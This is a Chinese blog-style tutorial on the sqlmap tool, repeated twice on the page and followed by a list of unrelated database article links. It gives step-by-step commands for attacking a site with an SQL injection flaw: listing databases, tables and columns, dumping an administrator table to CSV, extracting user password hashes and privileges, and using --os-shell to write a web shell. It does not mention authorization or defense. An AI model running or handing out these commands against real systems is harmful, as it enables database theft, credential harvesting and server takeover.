Sqlmap使用方法
2015-11-10 23:13
246 查看
SQLmap使用方法
1.查看数据库:pythonsqlmap -u
存在注入的URL地址 --dbs
以下是结果:
发现2个库。
2.接下来查看表名:
用法:python sqlmap -u 存在注入的URL地址 -D 数据库名(如图的xkb)--tables
3.查看字段:
图中是查看数据库xkb中cms_admin表中字段。结果如下:
4.爆字段内容
爆admin_name的内容。
5.脱裤
-C 字段,字段之间逗号分开。--threads线程数 start,stop就是要脱好多条记录。
最后结果会以CSV格式保存。
一些常用命令:
python sqlmap.py -u 注入地址 --is-dba
判断当前用户是不是DBA
python sqlmap.py -u 注入地址 --users 查看当前用户
python sqlmap.py -u 注入地址 --passwords
查看密码
python sqlmap.py -u 注入地址 --privileges
查看权限
python sqlmap.py -u 注入地址 --os-shell 写web shell
1.查看数据库:pythonsqlmap -u
存在注入的URL地址 --dbs
以下是结果:
发现2个库。
2.接下来查看表名:
用法:python sqlmap -u 存在注入的URL地址 -D 数据库名(如图的xkb)--tables
3.查看字段:
图中是查看数据库xkb中cms_admin表中字段。结果如下:
4.爆字段内容
爆admin_name的内容。
5.脱裤
-C 字段,字段之间逗号分开。--threads线程数 start,stop就是要脱好多条记录。
最后结果会以CSV格式保存。
一些常用命令:
python sqlmap.py -u 注入地址 --is-dba
判断当前用户是不是DBA
python sqlmap.py -u 注入地址 --users 查看当前用户
python sqlmap.py -u 注入地址 --passwords
查看密码
python sqlmap.py -u 注入地址 --privileges
查看权限
python sqlmap.py -u 注入地址 --os-shell 写web shell
相关文章推荐
- 数据库水平切分的实现原理解析——分库,分表,主从,集群,负载均衡器(转)
- 关于Oracle事务的总结
- 【mysql】关于临时表
- Oracle查询二
- mysql性能优化
- iOS sqlite 增删改查 简单封装(基于 FMDB)
- MongoDb 安装服务 以及 安全配置
- SQL基本表的操作
- Oracle查询
- MongoDB replication set复制集(主从复制)(8)
- ORACLE安装与操作系统用户组说明
- sql server数据库中 INFORMATION_SCHEMA的用法
- oracle plsql语句、游标
- oracle 锁表与解锁、数据恢复
- oracle触发器
- oracle函数大全
- 数据库介绍与分类
- PLSQL安装、连接服务器及字符编码更改
- 使用c3p0与DBCP连接池,造成的MySql 8小时问题解决方案
- Ubuntu Navicat for MySQL安装以及破解方案